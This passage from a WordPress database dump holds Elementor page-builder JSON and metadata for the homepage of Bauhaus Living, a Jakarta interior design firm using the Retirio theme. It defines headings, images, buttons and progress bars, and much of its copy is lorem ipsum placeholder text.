now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3848,4868,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3849,4868,'_elementor_pro_version','3.8.1'),(3850,4869,'_wp_page_template','elementor_header_footer'),(3851,4869,'_elementor_edit_mode','builder'),(3852,4869,'_elementor_template_type','wp-page'),(3853,4869,'_elementor_version','3.8.1'),(3854,4869,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">WELCOME TO BAUHAUS<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout 